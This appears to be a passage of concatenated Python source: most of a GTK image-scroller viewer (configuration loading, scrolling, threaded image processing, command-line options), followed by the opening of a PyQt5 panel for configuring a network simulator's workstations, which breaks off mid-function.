for p in filter(None, os.environ.get('XDG_CONFIG_DIRS', '').split(':')):
p = pl.Path(p) / self._conf_file_name
if p.exists(): self.update_from_file(p)
p = os.environ.get('XDG_CONFIG_HOME')
if p: p = pl.Path(p)
elif p := os.environ.get('HOME'): p = pl.Path(p) / '.config'
if p and (p := p / self._conf_file_name) and p.exists(): self.update_from_file(p)
for p in paths: self.update_from_file(p)
def update_from_file(self, path):
import configparser
log.debug('Updating configuration from file: {}', path)
conf = configparser.ConfigParser(allow_no_value=True)
conf.optionxform = lambda k: k
with open(path) as src: conf.read_file(src)
for sec in self._conf_sections:
sec_pre = f'{sec}_'
for k in dir(self):
if not k.startswith(sec_pre): continue
v = getattr(self, k)
if isinstance(v, str): get_val = lambda *a: str(conf.get(*a))
elif isinstance(v, bool): get_val = conf.getboolean
elif isinstance(v, int): get_val = conf.getint
elif isinstance(v, float): get_val = conf.getfloat
else: continue
for kc in k, k.replace('_', '-'):
try: setattr(self, k, get_val(sec, kc[len(sec_pre):]))
except configparser.Error: pass
else: break
def pprint(self, title=None):
cat, chk = None, re.compile(
'^({})_(.*)$'.format('|'.join(map(re.escape, self._conf_sections))) )
if title: print(f';; {title}')
for k in self.__class__.__dict__.keys():
m = chk.search(k)
if not m: continue
v, cat_chk = getattr(self, k), m.group(1).replace('_', '-')
if cat_chk != cat:
cat = cat_chk
print(f'\n[{cat}]')
if isinstance(v, bool): v = ['no', 'yes'][v]
elif isinstance(v, int): v = int(v)
k, v = m.group(2).replace('_', '-'), str(v).replace('\t', ' ')
print(f'{k} = {v}')
class ScrollerWindow(Gtk.ApplicationWindow):
def __init__(self, app, src_paths_iter, conf):
super().__init__(name='infinite-image-scroller', application=app)
self.app, self.src_paths_iter, self.conf = app, src_paths_iter, conf
self.log = get_logger('win')
self.set_title(self.conf.win_title)
self.set_role(self.conf.win_role)
if self.conf.win_icon:
self.log.debug('Using icon: {}', self.conf.win_icon)
self.set_icon_name(self.conf.win_icon)
self.pp = self.conf._image_proc_module
if self.pp:
self.pp, threading, queue = self.pp
self.thread_queue = queue.Queue()
self.thread_list = list(
threading.Thread( name=f'set_pixbuf.{n}',
target=self.image_set_pixbuf_thread, daemon=True )
for n in range(self.conf.image_proc_threads) )
for t in self.thread_list: t.start()
self.thread_kill = threading.get_ident(), signal.SIGUSR1
GLib.unix_signal_add( GLib.PRIORITY_DEFAULT,
self.thread_kill[1], self.image_set_pixbuf_thread_cb )
self.thread_results = list()
self.init_widgets()
def init_widgets(self):
css = Gtk.CssProvider()
css.load_from_data(self.conf._win_css.encode())
Gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(), css,
Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION )
self.dim_scroll_v = self.dim_scale_w = bool(self.conf.scroll_direction.value & 2) # up/down
self.dim_scroll_rev = not self.conf.scroll_direction.value & 1 # left/up
self.scroll = Gtk.ScrolledWindow()
self.scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
self.add(self.scroll)
self.box = Gtk.VBox if self.dim_scroll_v else Gtk.HBox
self.box = self.box(spacing=self.conf.misc_box_spacing, expand=True)
self.scroll.add(self.box)
self.box_images, self.box_images_init = cs.deque(), True
self.ev_timers = dict()
self.dim_scale, self.dim_scroll, self.dim_scroll_n = (
('width', 'height', 1) if self.dim_scroll_v else ('height', 'width', 0) )
self.dim_box_alloc = getattr(self.box, f'get_allocated_{self.dim_scroll}')
self.dim_box_pack = self.box.pack_start if not self.dim_scroll_rev else self.box.pack_end
self.dim_scroll_translate = ( (lambda a,b: a)
if not self.dim_scroll_rev else (lambda a,b: max(0, b - a)) )
self.dim_scroll_for_image = lambda img: getattr(img.get_allocation(), self.dim_scroll)
self.dim_scroll_for_pixbuf = lambda pb: getattr(pb, f'get_{self.dim_scroll}')()
self.scroll_adj = ( self.scroll.get_vadjustment()
if self.dim_scroll_v else self.scroll.get_hadjustment() )
self.scroll_adj.connect( 'value-changed',
ft.partial(self.ev_debounce, ev='scroll', cb=self.scroll_update) )
# self.scroll_adj_init = bool(self.dim_scroll_rev)
self.scroll_adj_image = None
hints = dict.fromkeys(self.conf._win_hints_all)
hints.update(self.conf.win_hints or dict())
for k in list(hints):
setter = getattr(self, f'set_{k}', None)
if not setter: setter = getattr(self, f'set_{k}_hint', None)
if not setter: setter = getattr(self, k, None)
if not setter: continue
v = hints.pop(k)
if v is None: continue
self.log.debug('Setting WM hint: {} = {}', k, v)
if not setter.get_arguments(): # e.g. w.fullscreen()
if v: setter()
continue
setter(v)
assert not hints, ['Unrecognized wm-hints:', hints]
self.set_type_hint(self.conf.win_type_hints)
self.connect('composited-changed', self.set_visual_rgba)
self.connect('screen-changed', self.set_visual_rgba)
self.set_visual_rgba(self)
self.set_default_size(*self.conf._win_size_default)
self.place_window_ev = None
self.place_window(self)
self.place_window_ev = self.connect('configure-event', self.place_window)
self.connect('key-press-event', self.window_key)
self.connect( 'configure-event',
ft.partial(self.ev_debounce, ev='set-pixbufs', cb=self.image_set_pixbufs) )
self.scroll_timer = None
if self.conf.scroll_auto: self.scroll_adjust(ScrollAdjust.toggle)
def ev_debounce_is_set(self, ev): return ev in self.ev_timers
def ev_debounce_clear(self, ev):
timer = self.ev_timers.pop(ev, None)
if timer is not None: GLib.source_remove(timer)
def ev_debounce_cb(self, ev, cb, ev_args):
self.ev_timers.pop(ev, None)
cb(*ev_args)
def ev_debounce(self, *ev_args, ev=None, cb=None):
self.ev_debounce_clear(ev)
self.ev_timers[ev] = GLib.timeout_add(
self.conf.misc_event_delay * 1000, self.ev_debounce_cb, ev, cb, ev_args )
def set_visual_rgba(self, w, *ev_data):
visual = w.get_screen().get_rgba_visual()
if visual: w.set_visual(visual)
def place_window(self, w, *ev_data):
if self.place_window_ev:
self.disconnect(self.place_window_ev)
self.place_window_ev = None
dsp, sg = w.get_screen().get_display(), Pos()
geom = dict(S=sg)
for n in range(dsp.get_n_monitors()):
rct = dsp.get_monitor(n).get_geometry()
mg = geom[f'M{n+1}'] = Pos(x=rct.x, y=rct.y, w=rct.width, h=rct.height)
sg.w, sg.h = max(sg.w, mg.x + mg.w), max(sg.h, mg.y + mg.h)
ww = wh = None
if self.conf.win_w and self.conf.win_h:
get_val = lambda v,k: int(v) if v.isdigit() else getattr(geom[v], k)
ww, wh = get_val(self.conf.win_w, 'w'), get_val(self.conf.win_h, 'h')
w.resize(ww, wh)
self.log.debug('win-resize: {} {}', ww, wh)
if self.conf.win_x or self.conf.win_y:
if not (ww or wh): ww, wh = w.get_size()
wx, wy = w.get_position()
get_pos = lambda v,k,wv: (
(int(v[1:]) if v[0] != '-' else (sg[k] - wv - int(v[1:])))
if v[0] in '+-' else getattr(geom[v], k) )
if self.conf.win_x: wx = get_pos(self.conf.win_x, 'x', ww)
if self.conf.win_y: wy = get_pos(self.conf.win_y, 'y', wh)
self.log.debug('win-move: {} {}', wx, wy)
w.move(wx, wy)
_key_sums = _key_masks = None
def window_key(self, w, ev):
if not self._key_masks:
self._key_masks = dict()
for st, mod in Gdk.ModifierType.__flags_values__.items():
if ( len(mod.value_names) != 1
or not mod.first_value_nick.endswith('-mask') ): continue
assert st not in self._key_masks, [mod.first_value_nick, self._key_masks[st]]
mod = mod.first_value_nick[:-5]
if mod.startswith('modifier-reserved-'): mod = 'res-{}'.format(mod[18:])
self._key_masks[st] = mod
if not self._key_sums:
self._key_sums = dict()
for k, action in [
('quit', 'q'), *((f'scroll_{k.name}', k) for k in ScrollAdjust) ]:
self._key_sums[action] = list(filter( None,
map(str.strip, getattr(self.conf, f'keys_{k}').split(',')) ))
chk, keyval = ev.get_keyval()
if not chk: return
key_sum, key_name = list(), Gdk.keyval_name(keyval)
for st, mod in self._key_masks.items():
if ev.state & st == st: key_sum.append(mod)
key_sum = ' '.join(sorted(key_sum) + [key_name]).lower()
self.log.debug('key-press-event: {!r}', key_sum)
for action, key_sums in self._key_sums.items():
if key_sum not in key_sums: continue
if action == 'q': self.app.quit()
elif isinstance(action, ScrollAdjust): self.scroll_adjust(action)
def scroll_update(self, adj, offset=None, repeat=False):
self.ev_debounce_clear('scroll')
pos_max = self.dim_box_alloc() - self.get_size()[self.dim_scroll_n]
pos = self.dim_scroll_translate(adj.get_value(), pos_max)
if offset:
pos = pos + offset
adj.set_value(self.dim_scroll_translate(pos, pos_max))
if ( pos >= pos_max * self.conf.scroll_queue_preload_at
and self.box_images and (
sum(bool(img.displayed) for img in self.box_images) / len(self.box_images)
> self.conf.scroll_queue_preload_at )):
pos += self.image_cycle()
adj.set_value(self.dim_scroll_translate(pos, pos_max))
# Check is to avoid expensive updates/reloads while window is resized
if not self.ev_debounce_is_set('set-pixbufs'): self.image_set_pixbufs()
return repeat
def image_cycle(self):
'Adds/removes images and returns scroll position adjustment based on their size.'
offset = offset_rev = 0
image = ...
while image is ... or len(self.box_images) < self.conf.scroll_queue_size:
image = self.image_add()
if not image: break
if image.displayed: # delayed loading runs image_set_scroll on gtk event
offset_rev += self.dim_scroll_for_image(image.gtk)
offset_rev += self.conf.misc_box_spacing
while len(self.box_images) > self.conf.scroll_queue_size:
image = self.box_images.popleft()
offset += self.dim_scroll_for_image(image.gtk)
self.image_remove(image)
offset += self.conf.misc_box_spacing
offset = -(offset if not self.dim_scroll_rev else offset_rev)
return offset
def image_add(self):
'Adds image and returns it, or returns None if there is nothing more to add.'
for n in range(self.conf.image_open_attempts):
try: p = next(self.src_paths_iter)
except StopIteration: p = None
if not p: return
image = self.image_load(p)
if image: break
else:
self.log.error( 'Failed to get new image'
' in {} attempt(s), giving up', self.conf.image_open_attempts )
return
self.dim_box_pack(image.gtk, False, False, 0)
self.box_images.append(image)
image.gtk.show()
return image
def image_remove(self, image):
self.box.remove(image.gtk)
image.gtk.destroy()
def image_load(self, path):
self.log.debug('Adding image: {}', path)
image = Image(path=path, gtk=Gtk.Image())
if not self.pp:
try: image.pb_src = GdkPixbuf.Pixbuf.new_from_file(path)
except Exception as err:
self.log.error( 'Failed to create gdk-pixbuf'
' from file: [{}] {}', err.__class__.__name__, err )
return
if self.conf.image_opacity < 1.0:
image.gtk.set_opacity(self.conf.image_opacity)
return image
def image_set_pixbufs(self, *ev_args, init=False):
'Must be called to set image widget contents to resized pixbufs'
if self.box_images_init:
self.box_images_init, init = False, True
init_sz = getattr(self.get_allocation(), self.dim_scroll) * 1.5
for n in range(self.conf.scroll_queue_size): self.image_add()
self.ev_debounce_clear('set-pixbufs')
sz = getattr(self.get_allocation(), self.dim_scale)
for image in list(self.box_images):
if image.sz_chk == sz: continue
image.sz_chk = sz
if image.pb_src: # simple sync processing with no helper module
w, h = image.pb_src.get_width(), image.pb_src.get_height()
w, h = ((sz, int(sz / (w / h))) if self.dim_scale_w else (int(sz * (w / h)), sz))
pixbuf = image.pb_src.scale_simple(w, h, self.conf.image_scale_algo)
image.gtk.set_from_pixbuf(pixbuf)
image.displayed = True
else: # background pixbuf_proc.so threads, except when init=True
image.sz, image.pb_proc = sz, None
log.debug('pixbuf_proc [{}]: {}', 'init' if init else 'queue', image.path)
if init and init_sz > 0:
self.image_set_pixbuf_proc(image)
if image.pb_proc: init_sz -= self.dim_scroll_for_pixbuf(image.pb_proc)
self.thread_results.append(image)
else: self.thread_queue.put_nowait(image)
if init and self.pp: self.image_set_pixbuf_thread_cb()
def image_set_pixbuf_proc(self, image):
sz = image.sz
w, h = ((sz, -1) if self.dim_scale_w else (-1, sz))
try:
buff, w, h, rs, alpha = self.pp.process_image_file(
image.path, w, h, int(self.conf.image_scale_algo), self.conf.image_brightness )
except self.pp.error as err:
self.log.error('Failed to load/process image: {}', err)
image.pb_proc = False
return
if image.sz != sz: return # was re-queued
image.pb_proc = GdkPixbuf.Pixbuf\
.new_from_data(buff, GdkPixbuf.Colorspace.RGB, alpha, 8, w, h, rs)
def image_set_pixbuf_thread(self):
while True:
image = self.thread_queue.get()
log.debug('pixbuf_proc [thread]: {}', image.path)
self.image_set_pixbuf_proc(image)
self.thread_results.append(image)
signal.pthread_kill(*self.thread_kill)
def image_set_pixbuf_thread_cb(self):
# Note: these are only called in series by glib, and do not interrupt each other
while True:
try: image = self.thread_results.pop()
except IndexError: break
log.debug('pixbuf_proc [signal]: {}', image.path)
if image.pb_proc is False:
self.box_images.remove(image)
self.image_remove(image)
else:
image.gtk.set_from_pixbuf(image.pb_proc)
if self.dim_scroll_rev: # scroll pos will change when image is drawn
image.gtk.connect('size-allocate', ft.partial(self.image_set_scroll, image))
image.pb_proc, image.displayed = None, True
return True
def image_set_scroll(self, image, w, ev):
if image.scrolled: return
image.scrolled = True
# This seem to cause some scroll-jumps, not sure why, maybe wrong gtk event?
offset = self.scroll_adj.get_value()
offset += self.dim_scroll_for_image(image.gtk)
offset += self.conf.misc_box_spacing
self.scroll_adj.set_value(offset)
def scroll_adjust(self, adj):
px, s = self.conf.scroll_auto or (0, 0)
adj_k = self.conf.scroll_adjust_k
if adj is ScrollAdjust.toggle:
if self.scroll_timer: px = s = 0 # pause
elif not (px and s): px, s = self.conf._scroll_auto_key_start
else: s += 1e-6 # just to trigger change check below
elif adj is ScrollAdjust.faster:
if not self.conf.scroll_auto: # just start with any parameters
return self.scroll_adjust(ScrollAdjust.toggle)
if s < 1/120: px *= adj_k # bump px jumps if it's >120fps already
else: s /= adj_k
elif adj is ScrollAdjust.slower:
if px <= 1: px, s = 1, s * adj_k # bump interval instead of sub-px skips
else: px /= adj_k
if (px, s) == self.conf.scroll_auto:
return log.warning(
'Scroll-adjust BUG [{}]: [run={} speed={}] -> no changes!',
adj.name, bool(self.scroll_timer), self.conf.scroll_auto )
log.debug( 'Scroll-adjust [{}]: [run={} speed={}] -> [run={} speed={}]',
adj.name, bool(self.scroll_timer), self.conf.scroll_auto, bool(px and s), (px, s) )
if self.scroll_timer: GLib.source_remove(self.scroll_timer)
if not (px and s): self.scroll_timer = None
else:
self.conf.scroll_auto = px, s
self.scroll_timer = GLib.timeout_add(s * 1000, ft.partial(
self.scroll_update, self.scroll_adj, offset=px, repeat=True ))
class ScrollerApp(Gtk.Application):
def __init__(self, src_paths_iter, conf):
self.src_paths_iter, self.conf = src_paths_iter, conf
super().__init__()
if self.conf.misc_app_id:
self.set_application_id(self.conf.misc_app_id.format(pid=os.getpid()))
if self.conf.misc_no_session: self.set_property('register-session', False)
def do_activate(self):
win = ScrollerWindow(self, self.src_paths_iter, self.conf)
win.connect('delete-event', lambda w,*data: self.quit())
win.show_all()
def shuffle_iter(src_paths, crop_ratio=0.25):
src_paths, used = list(src_paths), 0
while len(src_paths) > used:
n = random.randint(0, len(src_paths)-1)
p = src_paths[n]
if not p: continue
src_paths[n], used = None, used + 1
if used >= len(src_paths) * crop_ratio:
used, src_paths = 0, list(filter(None, src_paths))
yield p
def loop_iter(src_paths_func):
while True:
for p in src_paths_func(): yield p
def file_iter(src_paths):
for path in map(pl.Path, src_paths):
if not path.exists():
log.warn('Path does not exists: {}', path)
continue
if path.is_dir():
for root, dirs, files in os.walk(str(path)):
root = pl.Path(root)
for fn in files: yield str(root / fn)
else: yield str(path)
def main(args=None, conf=None):
if not conf: conf = ScrollerConf()
scale_algos = 'bilinear hyper nearest tiles'.split()
import argparse
class SmartHelpFormatter(argparse.HelpFormatter):
def __init__(self, *args, **kws):
return super().__init__(*args, **kws, width=100)
def _fill_text(self, text, width, indent):
if '\n' not in text: return super()._fill_text(text, width, indent)
return ''.join(indent + line for line in text.splitlines(keepends=True))
def _split_lines(self, text, width):
return ( super()._split_lines(text, width) if '\n' not in text
else dedent(re.sub(r'(?<=\S)\t+', ' ', text)).replace('\t', ' ').splitlines() )
parser = argparse.ArgumentParser(
formatter_class=SmartHelpFormatter,
description='Display image-scroller window.')
group = parser.add_argument_group('Image sources')
group.add_argument('image_path', nargs='*',
help='''
Path to file(s) or directories
(will be searched recursively) to display images from.
All found files will be treated as images,
use e.g. find/grep/xargs for filename-based filtering.
If no paths are provided, current
directory is used by default. See also --file-list option.''')
group.add_argument('-f', '--file-list', metavar='path',
help='''
File with a list of image files/dirs paths to use, separated by newlines.
Can be a fifo or pipe, use "-" to read it from stdin.''')
group.add_argument('-r', '--shuffle', action='store_true',
help='''
Read full list of input images
(dont use infinite --file-list) and shuffle it.''')
group.add_argument('-l', '--loop', action='store_true',
help='''
Loop (pre-buffered) input list of images infinitely.
Will re-read any dirs in image_path on each loop cycle,
and reshuffle files if -r/--shuffle is also specified.''')
group = parser.add_argument_group('Image processing')
group.add_argument('-z', '--scaling-interp',
default=scale_algos[0], metavar='algo', help=f'''
Interpolation algorithm to use to scale images to window size.
Supported ones: {", ".join(scale_algos)}. Default: %(default)s.
Can be specified by full name, prefix\
(e.g. "h" for "hyper") or digit (1={scale_algos[0]}).''')
group.add_argument('-b', '--brightness', type=float, metavar='float',
help='''
Adjust brightness of images before displaying them via HSP algorithm,
multiplying P by specified coefficient value (>1 - brighter, <1 - darker).
For more info on HSP, see http://alienryderflex.com/hsp.html
Requires compiled pixbuf_proc.so module importable somewhere, e.g. same dir as script.''')
group.add_argument('-m', '--proc-threads', type=int, metavar='n',
help='''
Number of background threads to use for loading and processing images.
Requires pixbuf_proc.so module to be loaded if value is specified,
and otherwise defaults to 0, which will translate to CPU thread count.''')
group = parser.add_argument_group('Scrolling')
group.add_argument('-d', '--scroll-direction', metavar='direction',
help=f'''
Direction for scrolling - left, right, up, down (can be specified by prefix, e.g. "r").
This determines where scrollbar will be, how images will be scaled
(either to window width or height), -a/--auto-scroll direction, as well as
on which window side new images will be appended (when scrolling close to it).''')
group.add_argument('-q', '--queue',
metavar='count[:preload-thresh]',
help=f'''
Number of images scrolling through a window and at which position
(0-1.0 with 0 being "top" and 1.0 "bottom") to pick/load/insert new images.
Format is: count[:preload-theshold].
Examples: 4:0.8, 10:0.5, 5:0.9. Default: {conf.scroll_queue_size}:{conf.scroll_queue_preload_at}''')
group.add_argument('-a', '--auto-scroll', metavar='px[:interval]',
help='''
Auto-scroll by specified number
of pixels with specified interval (1s by defaul).''')
group = parser.add_argument_group('Appearance')
group.add_argument('-o', '--opacity', type=float, metavar='0-1.0',
help=f'''
Opacity of the window contents - float value in 0-1.0 range,
with 0 being fully-transparent and 1.0 fully opaque.
Should only have any effect with compositing Window Manager.''')
group.add_argument('-p', '--pos', metavar='(WxH)(+X)(+Y)',
help='''
Set window size and/or position hints for WM (usually followed).
W/H values can be special "S" to use screen size,
e.g. "SxS" (or just "S") is "fullscreen".
X/Y offsets must be specified in that order, if at all, with positive
values (prefixed with "+") meaning offset from top-left corner
of the screen, and negative - bottom-right.
Special values like "M1" (or M2, M3, etc) can
be used to specify e.g. monitor-1 width/heigth/offsets,
and if size is just "M1" or "M2", then x/y offsets default to that monitor too.
If not specified (default), all are left for Window Manager to decide/remember.
Examples: 800x600, -0+0 (move to top-right corner),
S (full screen), 200xS+0, M2 (full monitor 2), M2+M1, M2x500+M1+524.
"slop" tool - https://github.com/naelstrof/slop - can be used
used to get this value interactively via mouse selection (e.g. "-p $(slop)").''')
group.add_argument('-s', '--spacing', type=int, metavar='px',
help=f'Padding between images, in pixels. Default: {conf.misc_box_spacing}px.')
group.add_argument('-x', '--wm-hints', metavar='(+|-)hint(,...)',
help='''
Comma or space-separated list of WM hints to set/unset for the window.
All of these can have boolean yes/no or unspecified/default values.
Specifying hint name in the list will have it explicity set (i.e. "yes/true" value),
and preceding name with "-" will have it explicitly unset instead ("no/false").
List of recognized hints:
{}.
Example: keep_top -decorated skip_taskbar skip_pager -accept_focus.'''\
.format('\n\t\t\t\t'.join(textwrap.wrap(', '.join(conf._win_hints_all), 75))))
group.add_argument('-t', '--wm-type-hints', metavar='hint(,...)',
help='''
Comma or space-separated list of window type hints for WM.
Similar to --wm-hints in general, but are
combined separately to set window type hint value.
List of recognized type-hints (all unset by default):
{}.
Probably does not make sense to use multiple of these at once.'''\
.format('\n\t\t\t\t'.join(textwrap.wrap(', '.join(conf._win_type_hints_all), 75))))
group.add_argument('-i', '--icon-name', metavar='icon',
help='''
Name of the XDG icon to use for the window.
Can be icon from a theme, one of the default gtk ones, and such.
See XDG standards for how this name gets resolved into actual file path.
Example: image-x-generic.''')
group = parser.add_argument_group('Configuration file options')
group.add_argument('-c', '--conf',
metavar='file', action='append',
help=f'''
Path of configuration file(s) to use.
Can be specified mutliple times to use multiple config files,
with values from the last one overriding earlier ones.
{conf._conf_file_name} is looked up in XDG_CONFIG_* paths by default.''')
group.add_argument('--conf-dump', action='store_true',
help='Print all configuration settings, which will be used with'
' currently detected (and/or specified) configuration file(s), and exit.')
group.add_argument('--conf-dump-defaults', action='store_true',
help='Print all default settings, which would be used'
' if no configuration file(s) were overriding these, and exit.')
group = parser.add_argument_group('Misc / debug')
group.add_argument('-n', '--no-register-session', action='store_true',
help='''
Do not try register app with any session manager.
Can be used to get rid of Gtk-WARNING messages
about these and to avoid using dbus, but not sure how/if it actually works.''')
group.add_argument('-u', '--unique', action='store_true',
help='Force application uniqueness via GTK application_id.'
' I.e. exit immediately if another app instance is already running.')
group.add_argument('--dump-css', action='store_true',
help='Print css that is used for windows by default and exit.')
group.add_argument('--debug', action='store_true', help='Verbose operation mode.')
opts = parser.parse_args(sys.argv[1:] if args is None else args)
global log
import logging
logging.basicConfig(
format='%(asctime)s :: %(levelname)s :: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.DEBUG if opts.debug else logging.WARNING )
log = get_logger('main')
if opts.conf_dump_defaults: return conf.pprint('Default configuration options')
conf_user_paths = list(pl.Path(p).expanduser() for p in opts.conf or list())
for p in conf_user_paths:
if not os.access(p, os.R_OK):
parser.error(f'Specified config file is missing or inaccessible: {p}')
conf.update_from_files(*conf_user_paths)
if opts.conf_dump: return conf.pprint('Current configuration file(s) options')
if opts.dump_css: return print(conf._win_css.replace('\t', ' '), end='')
src_paths = opts.image_path or list()
if opts.file_list:
if src_paths: parser.error('Either --file-list or image_path args can be specified, not both.')
src_file = pl.Path(opts.file_list).open() if opts.file_list != '-' else sys.stdin
src_paths = iter(lambda: src_file.readline().rstrip('\r\n').strip('\0'), '')
elif not src_paths: src_paths.append('.')
if opts.shuffle: random.seed()
if opts.loop:
src_func = lambda s=list(src_paths): file_iter(s)
if opts.shuffle: src_func = lambda f=src_func: shuffle_iter(f())
src_paths_iter = loop_iter(src_func)
elif opts.shuffle: src_paths_iter = shuffle_iter(file_iter(src_paths))
else: src_paths_iter = file_iter(src_paths)
if opts.scaling_interp:
algo = opts.scaling_interp.strip().lower()
if algo not in scale_algos:
if algo.isdigit():
try: algo = scale_algos[int(algo) - 1]
except: algo = None
else:
for a in scale_algos:
if not a.startswith(algo): continue
algo = a
break
else: algo = None
if not algo: parser.error(f'Unknown scaling interpolation value: {opts.scaling_interp}')
opts.scaling_interp = algo
if opts.auto_scroll or conf.scroll_auto:
if opts.auto_scroll: conf.scroll_auto = opts.auto_scroll
try: px, s = map(float, conf.scroll_auto.split(':', 1))
except ValueError: px, s = float(conf.scroll_auto), 1
conf.scroll_auto = px, s
if opts.scroll_direction or conf.scroll_direction:
if opts.scroll_direction: conf.scroll_direction = opts.scroll_direction
v_chk = conf.scroll_direction.strip().lower()
for v in ScrollDirection:
if not v.name.startswith(v_chk): continue
conf.scroll_direction = v
break
else: parser.error(f'Unrecognized -d/--scroll-direction value: {conf.scroll_direction}')
if opts.pos or conf.win_pos:
if opts.pos: conf.win_pos = opts.pos
m = re.search(
r'^((?:M?\d+|S)(?:x(?:M?\d+|S))?)?'
r'([-+]M?\d+)?([-+]M?\d+)?$', conf.win_pos )
if not m: parser.error(f'Invalid size/position spec: {conf.win_pos!r}')
size, x, y = m.groups()
size_fs = size if 'x' not in size else None
if size:
if size_fs: size = f'{size}x{size}'
conf.win_w, conf.win_h = size.split('x', 1)
if x: conf.win_x = x
if y: conf.win_y = y
if size_fs and not (x or y): conf.win_x = conf.win_y = size_fs
if opts.queue:
try: qs, q_pos = opts.queue.split(':', 1)
except ValueError: qs, q_pos = opts.queue, None
if qs: conf.scroll_queue_size = int(qs)
if q_pos: conf.scroll_queue_preload_at = float(q_pos)
if opts.wm_hints or conf.win_hints:
if opts.wm_hints: conf.win_hints = opts.wm_hints
conf.win_hints = dict(
(hint.lstrip('+-'), not hint.startswith('-'))
for hint in conf.win_hints.replace(',', ' ').split() )
if opts.wm_type_hints or conf.win_type_hints or True:
hints = opts.wm_type_hints or conf.win_type_hints
conf.win_type_hints = Gdk.WindowTypeHint.NORMAL
for k in hints.replace(',', ' ').split():
conf.win_type_hints |= conf._win_type_hints_all[k]
conf.image_scale_algo = getattr(
GdkPixbuf.InterpType, (opts.scaling_interp or conf.image_scale_algo).upper() )
if opts.icon_name: conf.win_icon = opts.icon_name
if opts.spacing is not None: conf.misc_box_spacing = opts.spacing
if opts.opacity is not None: conf.image_opacity = opts.opacity
if opts.brightness is not None:
conf.image_brightness = opts.brightness
if opts.brightness < 0: parser.error('-b/--brightness value must be >0')
if opts.proc_threads is not None: conf.image_proc_threads = opts.proc_threads
if opts.no_register_session is not None: conf.misc_no_session = opts.no_register_session
if not opts.unique: conf.misc_app_id += '.pid-{pid}'
try:
import pixbuf_proc, threading, queue
conf._image_proc_module = pixbuf_proc, threading, queue
except ImportError:
if conf.image_brightness != 1.0 or conf.image_proc_threads:
parser.error( 'pixbuf_proc.so module cannot be loaded, but is required'
' with these options - build it from pixbuf_proc.c in same repo as this script' )
else:
if not conf.image_proc_threads: conf.image_proc_threads = os.cpu_count()
log.debug('Starting application...')
ScrollerApp(src_paths_iter, conf).run()
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL)
sys.exit(main())
|
panelMain.py | # Qt
from PyQt5.Qt import pyqtSlot
# Basics
from threading import Thread, ThreadError
# Dependencies
from panel.workstations.panel_common import CommonWorkstation
from panel.workstations.panel_router import RouterConfiguration
from panel.workstations.panel_networks import NetworksConfiguration
from panel.common.CommonWidgets import *
# JSON generator
from common.generator_json import GeneratorJSON, LoaderJSON
from common.config import Config, compare_d_lists
# Main part of the software
import launcher
class PanelMain(QWidget):
def __init__(self):
super(PanelMain, self).__init__()
# Load available workstations
self.workstations_list = self.load_workstations_available()
self.resize(QSize(1750, 900))
self.setWindowTitle("SI Simulator V{}".format(Config.get_version()))
self.set_layout()
# Init networks config
self.network_configuration = NetworksConfiguration()
init_router = RouterConfiguration("router")
init_dns = CommonWorkstation("dns", "dns")
self.multi_window.addTab(self.network_configuration, "networks")
self.multi_window.addTab(init_router, "router")
self.multi_window.addTab(init_dns, "dns")
self.active_configurations = [init_router, init_dns]
self.j_gen = None
self.main_thread = None
self.connect_actions()
def load_workstations_available(self):
""" Get workstation types available for configure simulation
:return: Workstation types
:rtype: list
"""
return Config.get_available_workstations()
def set_layout(self):
""" Set layout """
# Create main layout
self.main_layout = QGridLayout(self)
# Workstation creation area
self.workstations_available = QComboBox()
for workstation in self.workstations_list:
self.workstations_available.addItem(workstation)
self.workstations_available.setCurrentIndex(self.workstations_available.findText("workstation"))
self.add_workstation = QPushButton("Add workstation")
name_label = QLabel("Workstation name : ")
self.workstation_name_value = QLineEdit()
workstation_type_label = QLabel("Type:")
# Workstations configuration area
self.multi_window = QTabWidget()
self.multi_window.setTabsClosable(True)
self.main_layout.addWidget(name_label, 0, 0)
self.main_layout.addWidget(self.workstation_name_value, 0, 1)
self.main_layout.addWidget(workstation_type_label, 0, 3)
self.main_layout.addWidget(self.workstations_available, 0, 4)
self.main_layout.addWidget(self.add_workstation, 0, 5)
self.main_layout.addWidget(self.multi_window, 2, 0, 1, 6)
group_actions = QGroupBox("Simulation")
group_layout = QGridLayout()
self.launcher_button = QPushButton("Save configuration")
group_layout.addWidget(self.launcher_button, 0, 0)
self.loader_button = QPushButton("Load configuration")
group_layout.addWidget(self.loader_button, 1, 0)
self.check_configuration = QPushButton("Verify configuration")
group_layout.addWidget(self.check_configuration, 2, 0)
group_actions.setLayout(group_layout)
self.main_layout.addWidget(group_actions, 3, 0, 1, 8)
def connect_actions(self):
""" Connect signals to dedicated functions """
self.add_workstation.clicked.connect(self.add_selected_workstation)
self.workstation_name_value.returnPressed.connect(self.add_selected_workstation)
self.multi_window.currentChanged.connect(self.update_networks_list)
self.launcher_button.clicked.connect(self.generate_configuration)
self.loader_button.clicked.connect(self.load_configuration)
self.check_configuration.clicked.connect(self.check_parameters)
# Tab signal
self.multi_window.tabCloseRequested.connect(self.close_tab)
@pyqtSlot()
def add_selected_workstation(self):
workstation = self.workstation_name_value.text()
if workstation != "":
type = self.workstations_available.currentText()
if type != "router":
workstation_configuration = CommonWorkstation(workstation, type)
else:
workstation_configuration = RouterConfiguration(workstation)
self.active_configurations.append(workstation_configuration)
self.multi_window.addTab(workstation_configuration, workstation)
else:
PopUpWidget("Please enter a workstation name")
@pyqtSlot()
def update_networks_list(self):
# Get networks basic configuration
networks_list = self.network_configuration.get_configured_networks()
networks_update = []
# Update using configuration in router configurations
for workstation in self.active_configurations:
if workstation.workstation_type in ["router"]:
networks_update += workstation.get_networks_list()
# Compare lists to determine if networks configuration has been updated
try:
networks_list = compare_d_lists(networks_list, networks_update)
except:
pass
for workstation in self.active_configurations:
workstation.update_networks_list(networks_list)
@pyqtSlot()
def generate_configuration(self):
"""
:return:
"""
# File dialog : select target directory
try:
dial = QFileDialog()
dial.setBaseSize(QSize(1480, 900))
dial.setAcceptMode(dial.AcceptMode(1))
directory = dial.getExistingDirectory(options=QFileDialog.DontUseNativeDialog)
network_configuration = self.network_configuration.get_current_configuration()
physic_configuration = [workstation.get_configuration()["physic"] for workstation in self.active_configurations]
logic_configuration = [workstation.get_configuration()["logic"] for workstation in self.active_configurations]
simulation_configuration = [workstation.get_simulation_configuration() for workstation in self.active_configurations]
if directory not in [""]:
